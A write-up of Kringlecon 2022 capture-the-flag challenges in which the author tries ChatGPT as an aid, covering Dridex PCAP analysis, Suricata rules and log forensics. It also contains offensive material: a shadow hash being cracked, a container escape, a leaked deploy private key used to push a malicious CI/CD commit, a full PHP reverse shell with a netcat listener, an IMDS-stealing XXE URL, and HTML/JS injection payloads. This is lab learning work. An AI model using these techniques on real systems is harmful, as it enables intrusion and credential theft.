Kringlecon 22 and chatGPT fun
This is my write-up around a couple of Kringlecon22 challenges. I wanted to use chatGPT as much as possible as an experiment for some of these challenges. It's a pretty cool tool to add to your arsenal but it's far from perfect. If you don't know what you're doing, it'll probably point you in the wrong direction. If you know what you're doing, it'll speed up your workflow by providing code/commands you can fix ( suricata rule generation was nice; cracking shadow passwords was cool but didn't mention you had to run unshadow first etc.).
Tolkien ring
PCAP Analysis
1.First question is what type of objects can we export from the pcap?
HTTP
2. What is the filename of the largest file we can export? > app.php
3. What packet number starts the app.php file?
687
4. What is the ip of the Apache server?
?> 192.185.57.242
5. What file is save to the infected host?
'Ref_Sept24-2020.zip'
6.Attackers used bad TLS certificates in this traffic. Which countries were they registered to?
To find that:
Use: tls.handshake.type == 11
On packet 808:
1) make sure the setting "Allow subdissector to reassemble TCP streams" is on in the TCP protocol preferences
2) Then go to the packet which contains the SSL handshake message "Certificate" 3) In the packet detail pane, expand the SSL protocol
4) Expand the "Certificate" TLS record
5) Expand the "certificate" handshake protocol
6) Expand the list of certificates. There is now a list of certificate length and certificates (the list could be only 1 certificate). The first certificate is the server certificate, the second it's signing CA, the third the CA that signed the CA, etc.
7) Now rightclick on the certificate that you want to export
8) Choose "Export selected packet bytes..."
9) Choose a filename and click on save
Then convert the DER to PEM using openssl and decode it with openssl or an online tool. We then get the following info:
There's two bad certificates (the other ones are legitimate Microsoft certificates). We rinse and repeat and get the below answers:
Israel, South Sudan
7. Is the host infected?
Yes; See below for details
File extraction:
We download suspicious pcap; See some http, copy the gzip decompressed body as text:
Then we just copy paste the following as well as the function below (with the big atob string to the dev console in chrome/firefox:
function saveAs(blob, fileName) { let url = window.URL.createObjectURL(blob);
let anchorElem = document.createElement('a');
anchorElem.style = 'display: none';
anchorElem.href = url;
anchorElem.download = fileName;
document.body.appendChild(anchorElem);
anchorElem.click();
document.body.removeChild(anchorElem);
// On Edge, revokeObjectURL should be called only after
// a.click() has completed, atleast on EdgeHTML 15.15048
setTimeout(function() {
window.URL.revokeObjectURL(url);
}, 1000);
}This downloads 'Ref_Sept24-2020.zip' to our computer which contains a .scr file that gets flagged by windows defender.
DIE tells us it's a RAR archive (probably a self-extracting RAR)
We extract that scr using 7zip and get a couple of interesting files:
Selector.vbs just runs dsep.bat; that renames SLP.txt to h1.rar and extracts it so we do that manually. The bat file tells us the password is "Version"
rename SLP.txt hl.rar
"PLS.exe" e -pVersion hl.rar
timeout 5
start fatless.vbs
timeout 4
del /f /q "hl.rar"
del /f /q "dsep.bat"
del /f /q "C:\Users\mycomp\Desktop\inst.exe"
@exitPart 2 powershell logs
We filter by task category and notice the following:
With that, we understand that recipe.txt is what the attacker is after. We search for recipe.txt and see events on the 12/24/2022 tied to recipe.txt being deleted.
Knowing this, we can now apply a filter for events after 12/23/2022 to remove noise.
For question 3, I couldn't find the right command using Windows event log viewer; That's because the GUI abstracts some of the info. Using grep I managed to find the answer:
When did the attack occur? >12/24/2022
What is the filename from which the attacker read secrets? > Recipe.txt
$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'}
$foo | Add-Content -Path 'Recipe'
>Recipe.txt
6. Were any files deleted? >Yes
7. Was the file from 2) deleted? >No
8. What is the eventId of the logs that show the attacker's commands being run? >4104
9. Is the secret ingredient compromised? > Yes
10.What is the secret ingredient? >honey
Suricata rules
My first rule to match adv[.]epostoday[.]uk was:
alert dns any any -> any any (msg:"Known bad DNS lookup, possible Dridex infection"; dns_query; content:"adv.epostoday.uk"; nocase; metadata:created_at 2019_05_15, updated_at 2019_05_15; classtype:trojan-activity; sid:1234; rev:1;)For the second rule to match 192[.]185[.]57[.]242
I decided to try this the modern way and asked ChatGPT ( https://chat.openai.com/chat ):
This didn't work and I got:
So I submitted the error to chatGPT:
This still didn't work; I tried using http instead of the "ip" key word and removed both "flow" and "content" this matched 454 packets out of 681.
alert http 192.185.57.242 any -> $HOME_NET any (msg:"Investigate suspicious connections, possible Dridex infection"; sid:12345; rev:1;)For the second indicator, we flagged 454 packet(s), but we expected 681. Please try again!Not sure what was missing there and I thought I might be matching traffic in one direction only. I asked chatGPT:
That obviously didn't work but the error gave me the answer:
Bi-direction is <> instead of ->
So we change our rule to:
````
alert http 192.185.57.242 any <> $HOME_NET any (msg:"Investigate suspicious connections, possible Dridex infection"; sid:12345; rev:1;)
Third rule being asked is:
We heard that some naughty actors are using TLS certificates with a specific CN. Develop a Suricata rule to match and alert on an SSL certificate for heardbellith.Icanwepeh.nagoya. When your rule matches, the message (msg) should read Investigate bad certificates, possible Dridex infection
Hmm... Pretty good start this time. I changed it a bit using https://suricata.readthedocs.io/en/suricata-6.0.0/rules/tls-keywords.html and got:
alert tls $EXTERNAL_NET any -> $HOME_NET any (msg:"Investigate bad certificates, possible Dridex infection"; tls.cert_subject; content: "CN=heardbellith.Icanwepeh.nagoya";)Which worked nicely
OK, one more to rule them all and in the darkness find them. Let's watch for one line from the JavaScript: let byteCharacters = atob Oh, and that string might be GZip compressed - I hope that's OK! Just in case they try this again, please alert on that HTTP data with message Suspicious JavaScript function, possible Dridex infection
ChatGPT returns the following with this prompt:
"Write a rule to watch for one line from the JavaScript: "let byteCharacters = atob" This string might be gzip compressed. Please alert on that HTTP data with message Suspicious JavaScript function, possible Dridex infection"
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"Suspicious JavaScript function, possible Dridex infection"; content:"let byteCharacters = atob"; flow:established,to_server; http_content_type; content: "text/javascript"; http_accept_encoding; content: "gzip";)Nice start but I had to change it to:
alert http any any -> any any (msg:"Suspicious JavaScript function, possible Dridex infection";file_data; content:"let byteCharacters = atob"; )As according to the docs file_data matches strings even for gziped content.
Elven ring
Git
I tried the below and got a permission denied error:
Trying orc_admin came from browsing the repo at https://haugfactory.com/orcadmin and finding this user. Again, I tried using ChatGPT.
That didn't work; So I went to the gitlab website and pressed the clone button to get the http command:
Terminal prompts below to answer:
Container escape
The challenge logs us in a container jail. Goal is to escape and probably read a flag somewhere. I tried using ChatGPT but it was not super helpfull; https://www.cyberark.com/resources/threat-research-blog/the-route-to-root-container-escape-using-kernel-exploitation gave me some pretty good tips towards getting this to work!
First I performed basic recon:
The asked ChatGPT:
I tried all of the above but they were all pretty useless.
Let's keep going with recon:
Connecting to that second ip on port 2222 asks us for samways password. We can use hashcat or jon to try and get that. The entry in /etc/shado file is:
samways:$6$BRdK69UoIKU9YNPO$fUAXgJXgm68OEASm0354QS/fFkhTHFkswGAT9mrJMY0L8vEw53Ija9lsisesYy0Ja4h/bg1M6fEfVbF3zzgCL.:19363::::::Couple of prompts for ChatGPT asking it to crack our password:
What is a bit disappointing here is that chatGPT didn't mention you need to unshadow the message.
Ok so with all that said and done, we run:
unshadow.exe passwd.txt shadow.txt > unshadowed.txt
john.exe --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txtAfter a while we end up with:
password is samways... duh!
Unfortunately, trying to ssh to that machine didn't work.
Running ps, we see s6-supervise processes
We know running sudo su gets us root.
We look at capabilities:
grinchum-land:/home/samways# cat /proc/self/status
We check devices in /dev
grinchum-land:/home/samways# ls /dev
autofs loop0 nvram tty1 tty20 tty31 tty42 tty53 tty7 vcs5 vcsu3
btrfs-control loop1 ptmx tty10 tty21 tty32 tty43 tty54 tty8 vcs6 vcsu4
core loop2 ptp0 tty11 tty22 tty33 tty44 tty55 tty9 vcsa vcsu5
cpu loop3 pts tty12 tty23 tty34 tty45 tty56 ttyS0 vcsa1 vcsu6
cpu_dma_latency loop4 random tty13 tty24 tty35 tty46 tty57 uhid vcsa2 vda
cuse loop5 shm tty14 tty25 tty36 tty47 tty58 uinput vcsa3 vsock
fd loop6 snapshot tty15 tty26 tty37 tty48 tty59 urandom vcsa4 zero
full loop7 stderr tty16 tty27 tty38 tty49 tty6 vcs vcsa5
fuse mem stdin tty17 tty28 tty39 tty5 tty60 vcs1 vcsa6
input mqueue stdout tty18 tty29 tty4 tty50 tty61 vcs2 vcsu
kmsg net tty tty19 tty3 tty40 tty51 tty62 vcs3 vcsu1
loop-control null tty0 tty2 tty30 tty41 tty52 tty63 vcs4 vcsu2And we try mounting vda to /mnt:
grinchum-land:/dev# ls /mnt/
bin dev home lib32 libx32 media opt root sbin sys usr
boot etc lib lib64 lost+found mnt proc run srv tmp var/mnt/home shows the user jailer -> Nice!
At this point we could try cracking /etc/shadow and /etc/passwd; Another option is adding a user and hash in there;
I poked around /home/jailer and ran cat on the private ssh key:
grinchum-land:/dev# ls -al /mnt/home/jailer/.ssh/jail.key.priv
-rw-rw-rw- 1 root root 1555 Nov 3 23:36 /mnt/home/jailer/.ssh/jail.key.priv
grinchum-land:/dev# cat /mnt/home/jailer/.ssh/jail.key.priv
Congratulations!
You've found the secret for the
HHC22 container escape challenge!
.--._..--.
___ ( _'-_ -_.'
_.-' `-._| - :- |
_.-' `--...__|
.-' '--..___
/ `._ \
`. `._ one |
`. `._ /
'. `._ :__________....-----'
`..`---' |-_ _- |___...----..._
|_....--' `.`.
_...--' `.`.
_..-' _.'.'
.-' step _.'.'
| _.'.'
| __....------'-'
| __...------''' _|
'--''' |- - _ |
_.-''''''''''''''''''-._
_.' |\
.' _.' |
`._ closer |:.'
`._ _.' |
`..__ | |
`---.._.--. _| |
| _ - | `-.._|_.'
.--...__ | - _|
.'_ `--.....__ |
.'_ `--..__
.'_ `.
.'_ 082bb339ec19de4935867 `-.
`--..____ _`.
```--...____ _..--'
| - _ ```---.._.'
| - _ |
|_ - - |
| - _ |
| -_ -_|
| - _ |
| - _ |
| -_ -_|Oh... Well ok then! As you can see, chatGPT wasn't great there;
CI/CD pipeline
The prompt gives us the following:
Greetings Noble Player,
Many thanks for answering our desperate cry for help!
You may have heard that some evil Sporcs have opened up a web-store selling
counterfeit banners and flags of the many noble houses found in the land of
the North! They have leveraged some dastardly technology to power their
storefront, and this technology is known as PHP!
***gasp***
This strorefront utilizes a truly despicable amount of resources to keep the
website up. And there is only a certain type of Christmas Magic capable of
powering such a thing… an Elfen Ring!
Along with PHP there is something new we've not yet seen in our land.
A technology called Continuous Integration and Continuous Deployment!
Be wary!
Many fair elves have suffered greatly but in doing so, they've managed to
secure you a persistent connection on an internal network.
BTW take excellent notes!
Should you lose your connection or be discovered and evicted the
elves can work to re-establish persistence. In fact, the sound off fans
and the sag in lighting tells me all the systems are booting up again right now.
Please, for the sake of our Holiday help us recover the Ring and save Christmas!We do some recon again:
grinchum-land:~$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 208 64 ? Ss 00:09 0:00 /package/admin/s6/command/s6-svscan -d4 -- /run/service
root 15 0.0 0.0 212 64 ? S 00:09 0:00 s6-supervise s6-linux-init-shutdownd
root 16 0.0 0.0 200 4 ? Ss 00:09 0:00 /package/admin/s6-linux-init/command/s6-linux-init-shutdownd -c /run/s6/basedir -g 3000 -C -B
root 34 0.0 0.0 212 64 ? S 00:09 0:00 s6-supervise log-openssh-server
root 35 0.0 0.0 212 64 ? S 00:09 0:00 s6-supervise s6rc-fdholder
root 36 0.0 0.0 212 60 ? S 00:09 0:00 s6-supervise s6rc-oneshot-runner
root 37 0.0 0.0 212 64 ? S 00:09 0:00 s6-supervise svc-openssh-server
root 48 0.0 0.0 520 152 ? Ss 00:09 0:00 /package/admin/s6-2.11.1.2/command/s6-fdholderd -1 -i data/rules
root 51 0.0 0.0 188 4 ? Ss 00:09 0:00 /package/admin/s6/command/s6-ipcserverd -1 -- /package/admin/s6/command/s6-ipcserver-access -v0 -E -l0 -i data/rules -- /package/admin/s6/comman
samways 157 0.0 0.0 276 4 ? Ss 00:09 0:00 s6-log n30 s10000000 S30000000 T !gzip -nq9 /config/logs/openssh
samways 162 0.0 0.0 4716 3808 ? Ss 00:09 0:00 sshd.pam: /usr/sbin/sshd.pam -D -e -p 2222 [listener] 0 of 10-100 startups
samways 184 0.0 0.0 4732 3920 ? Ss 00:09 0:00 sshd.pam: samways [priv]
samways 186 0.0 0.0 4968 3080 ? S 00:09 0:00 sshd.pam: samways@pts/0
samways 187 0.0 0.0 2592 2212 pts/0 Ss 00:09 0:00 -bash
samways 190 0.0 0.0 1708 872 pts/0 R+ 00:11 0:00 ps aux
Running git clone on this, we can't resolve the domain.
We run ifconfig and see we have nmap on the host. Asking ChatGPT:
grinchum-land:/home/samways# nmap -sn 172.18.0.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-07 00:26 GMT
Nmap scan report for 172.18.0.1
Host is up (0.00013s latency).
MAC Address: 02:42:0A:F2:58:85 (Unknown)
Nmap scan report for wordpress-db.local_docker_network (172.18.0.87)
Host is up (0.000055s latency).
MAC Address: 02:42:AC:12:00:57 (Unknown)
Nmap scan report for wordpress.local_docker_network (172.18.0.88)
Host is up (0.000037s latency).
MAC Address: 02:42:AC:12:00:58 (Unknown)
Nmap scan report for gitlab.local_docker_network (172.18.0.150)
Host is up (0.000039s latency).
MAC Address: 02:42:AC:12:00:96 (Unknown)
Nmap scan report for grinchum-land.flag.net.internal (172.18.0.99)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.86 secondsNmap scan on one of these ips:
grinchum-land:~$ nmap 172.18.0.150
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-07 00:37 GMT
Nmap scan report for gitlab.local_docker_network (172.18.0.150)
Host is up (0.00037s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8181/tcp open intermapperNice; we now know what the gitlab domain is. Let's clone it
grinchum-land:/home/samways# git clone http://172.18.0.150/rings-of-powder/wordpress.flag.net.interna
l.git
Cloning into 'wordpress.flag.net.internal'...
remote: Enumerating objects: 10195, done.
remote: Total 10195 (delta 0), reused 0 (delta 0), pack-reused 10195
Receiving objects: 100% (10195/10195), 36.49 MiB | 21.78 MiB/s, done.
Resolving deltas: 100% (1799/1799), done.
Updating files: 100% (9320/9320), done.
grinchum-land:/home/samways# ls
wordpress.flag.net.internalgrinchum-land:/home/samways/wordpress.flag.net.internal# ls
index.php wp-admin wp-config.php wp-links-opml.php wp-settings.php
license.txt wp-blog-header.php wp-content wp-load.php wp-signup.php
readme.html wp-comments-post.php wp-cron.php wp-login.php wp-trackback.php
wp-activate.php wp-config-sample.php wp-includes wp-mail.php xmlrpc.phpgit log outputs the following:
commit 37b5d575bf81878934adb937a4fff0d32a8da105 (HEAD -> main, origin/main, origin/HEAD)
Author: knee-oh <sporx@kringlecon.com>
Date: Wed Oct 26 13:58:15 2022 -0700
updated wp-config
commit a59cfe83522c9aeff80d49a0be2226f4799ed239
Author: knee-oh <sporx@kringlecon.com>
Date: Wed Oct 26 12:41:05 2022 -0700
update gitlab.ci.yml
commit a968d32c0b58fd64744f8698cbdb60a97ec604ed
Author: knee-oh <sporx@kringlecon.com>
Date: Tue Oct 25 16:43:48 2022 -0700
test
commit 7093aad279fc4b57f13884cf162f7d80f744eea5
Author: knee-oh <sporx@kringlecon.com>
Date: Tue Oct 25 15:08:14 2022 -0700
add gitlab-ci
commit e2208e4bae4d41d939ef21885f13ea8286b24f05
Author: knee-oh <sporx@kringlecon.com>
Date: Tue Oct 25 13:43:53 2022 -0700
big update
commit e19f653bde9ea3de6af21a587e41e7a909db1ca5
Author: knee-oh <sporx@kringlecon.com>
Date: Tue Oct 25 13:42:54 2022 -0700
whoops
commit abdea0ebb21b156c01f7533cea3b895c26198c98
Author: knee-oh <sporx@kringlecon.com>
Date: Tue Oct 25 13:42:13 2022 -0700
added assets
commit a7d8f4de0c594a0bbfc963bf64ab8ac8a2f166ca
Author: knee-oh <sporx@kringlecon.com>
Date: Mon Oct 24 17:32:07 2022 -0700
init commitThe woops commit seems interesting;
# git diff e19f653bde9ea3de6af21a587e41e7a909d
b1ca5 abdea0ebb21b156c01f7533cea3b895c26198c98
Author: knee-oh <sporx@kringlecon.com>
diff --git a/.ssh/.deploy b/.ssh/.deploy
new file mode 100644
index 0000000..3f7a9e3
--- /dev/null
+++ b/.ssh/.deploy
@@ -0,0 +1,7 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
+QyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4gAAAJiQFTn3kBU5
+9wAAAAtzc2gtZWQyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4g
+AAAEBL0qH+iiHi9Khw6QtD6+DHwFwYc50cwR0HjNsfOVXOcv7AsdI7HOvk4piOcwLZfDot
+PqBj2tDq9NBdTUkbZBriAAAAFHNwb3J4QGtyaW5nbGVjb24uY29tAQ==
+-----END OPENSSH PRIVATE KEY-----
diff --git a/.ssh/.deploy.pub b/.ssh/.deploy.pub
new file mode 100644
index 0000000..8c0b43c
--- /dev/null
+++ b/.ssh/.deploy.pub
@@ -0,0 +1 @@
+ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP7AsdI7HOvk4piOcwLZfDotPqBj2tDq9NBdTUkbZBri sporx@kringlecon.co
mWe try to ssh to the gitlab host
grinchum-land:~$ ssh -i .ssh/deploy.pem sporx@172.18.0.150sporx@172.18.0.150: Permission denied (publickey).Ok, that didn't work; let's try the wordpress host:
grinchum-land:~$ ssh -i .ssh/deploy.pem sporx@172.18.0.88
sporx@172.18.0.88's password:
grinchum-land:~$ ssh -i .ssh/deploy.pem 172.18.0.88
samways@172.18.0.88's password: Ok, that didn't work...
Lets look for creds in wp:
No interesting creds as they're pulled from variables.
Then I remembered this was about CI/CD deployments; let's try to commit to the repo:
grinchum-land:/home/samways/wordpress.flag.net.internal# git status
On branch main
Your branch is up to date with 'origin/main'.
Changes not staged for commit:
(use "git add <file>..." to update what will be committed)
(use "git restore <file>..." to discard changes in working directory)
modified: readme.html
no changes added to commit (use "git add" and/or "git commit -a")
grinchum-land:/home/samways/wordpress.flag.net.internal# git add *
grinchum-land:/home/samways/wordpress.flag.net.internal# git commit test
error: pathspec 'test' did not match any file(s) known to git
grinchum-land:/home/samways/wordpress.flag.net.internal# git commit -m test
[main e042b3a] test
Committer: root <root@grinchum-land.flag.net.internal>
Your name and email address were configured automatically based
on your username and hostname. Please check that they are accurate.
You can suppress this message by setting them explicitly. Run the
following command and follow the instructions in your editor to edit
your configuration file:
git config --global --edit
After doing this, you may fix the identity used for this commit with:
git commit --amend --reset-author
1 file changed, 1 insertion(+)
grinchum-land:/home/samways/wordpress.flag.net.internal# Ok; I think I need to commit as sporx@kringlecon.com using that pem key; let's try that
``` grinchum-land:~/myrepo$ git remote set-url origin ssh://sporx@172.18.0.150/rings-of-powder/wordpress.flag.net.internal.git```
grinchum-land:~/sporx-clone$ cat .gitlab-ci.yml
stages:
- deploy
deploy-job:
stage: deploy
environment: production
script:
- rsync -e "ssh -i /etc/gitlab-runner/hhc22-wordpress-deploy" --chown=www-data:www-data -atv --delete --progress ./ root@wordpress.flag.net.internal:/var/www/htmlAfter seeing the gitlab docs https://docs.gitlab.com/ee/user/ssh.html I ran the following:
Nice! Now we run:
git config --global user.email "sporx@kringlecon.com"
git config --global user.name "knee-oh"
git clone git@@172.18.0.150:/rings-of-powder/wordpress.flag.net.internal.git
touch temp
git add *
git commit -m "evil commit"
git pushAwesome! We just pushed our commit which is now getting deployed.
Now we just need to upload a reverse shell to pwn this! We can just use a simple php shell payload
We launch a screen with a netcat listener:
screen
nc -nlvp 1234Add our shell from chatGPT:
Curl our website (to trigger the php code) and wait...
The above fcloses the socket so I asked chatGPT:
And got the following code:
<?php
// PHP Reverse Shell
$ip = '$ip'; // CHANGE THIS
$port = $port; // CHANGE THIS
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if(!$sock) {
die("$errstr ($errno)");
}
// Send shell commands to attacker
$data = "User: " . get_current_user();
$data .= "\n";
$data .= "Directory: " . getcwd();
$data .= "\n";
$data .= "Shell: " . $_SERVER['SHELL'];
$data .= "\n\n";
fwrite($sock, $data);
// Start an infinite loop to continuously send commands to the attacker
while(1) {
fwrite($sock, "shell> ");
$cmd = fread($sock, 1024);
$output = shell_exec($cmd);
fwrite($sock, $output);
}
We look at / and find flag.txt a cat returns the elven ring!!!!
Web Ring
Use the artifacts from Alabaster Snowball to analyze this attack on the Boria mines. Most of the traffic to this site is nice, but one IP address is being naughty! Which is it? Visit Sparkle Redberry in the Tolkien Ring for hints.
Pretty obvious mass hits to /login.html with POST requests; indicator of a bruteforce attack.
Bad ip is 18.222.86.32
The first attack is a brute force login. What's the first username tried?
We use the following filter in Wireshark:
The next attack is forced browsing where the naughty one is guessing URLs. What's the first successful URL path in this attack?
In the txt file, we look for lots of 404 coming from the bad IP and look for the next 202 success right after:
The last step in this attack was to use XXE to get secret keys from the IMDS service. What URL did the attacker force the server to fetch?
There's a couple of XXE attacks (and technically file:///etc/passwd can be considered a uri ) but the first successfull attacker submitted URI through that XXE/SSRF is:
http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instanceWhich is meant to grab an ec2 instance's IMDS credentials (note that if they used IMDSV2, this wouldn't have happened)
Boria mine locks
We're faced with JS implemented locks;
We open the dev console;
First set of chars is in an html comment:
@&@&&W&&W&&&&
Second lock has the following comment:
So we understand we probably need to perform some kind of injection?
We try to draw the line by injecting svg and play with width and coords to tie both edges together:
<svg height="210" width="500">
<line x1="0" y1="70" x2="250" y2="170" stroke="white" stroke-width="5" />
</svg>
The next box has the following html comment:
TODO: FILTER OUT JAVASCRIPT FROM USER INPUT
So we understand that we need to inject js; Maybe we can create the same svg payload as above through js.
Lock 3 also has the following CSP applied to it:
I used the following SO post as a base: https://stackoverflow.com/questions/20539196/creating-svg-elements-dynamically-with-javascript-inside-html
Setting the background style to blue works:
<script>document.body.style.color="blue"; document.body.style.backgroundColor = "blue"; </script>
<h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>
<h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>
<h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>
For the next one we see a sanitize input method:
We check the sanitizeInput() code:
<script>
const sanitizeInput = () => {
const input = document.querySelector('.inputTxt');
const content = input.value;
input.value = content
.replace(/"/, '')
.replace(/'/, '')
.replace(/</, '')
.replace(/>/, '');
}
</script>Ok so we can't use " ' < or > ; Or we can just ignore the sanitizeInput() js by removing it in the html code prior to submission
For pin4 I used the below but had to disable the sanitizeInput() function before submission:
<script>document.body.style.backgroundImage = 'linear-gradient(to top,white 0%,white 70%,blue 70%,blue 100%)';</script><h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>For pin5 I used:
<script>document.body.style.color="blue"; document.body.style.lineHeight = "0.90em";</script>
<font size="6"><br><br><br><br>         &&&&</font><br><font size="6">      &&W</font><br><font size="7"> &&W</font><font color="blue"size="5">     &&&&</font><br><font size="6"> @</font><font color="blue" size="6">     &&W</font><br><font size="8">&</font><font color="blue" size="6">   &&W</font><br><font size="8">@</font><font color="blue" size="7"> @</font><br><font color="blue" size="6">   &</font><br><font color="blue" size="6">  @</font>Last updated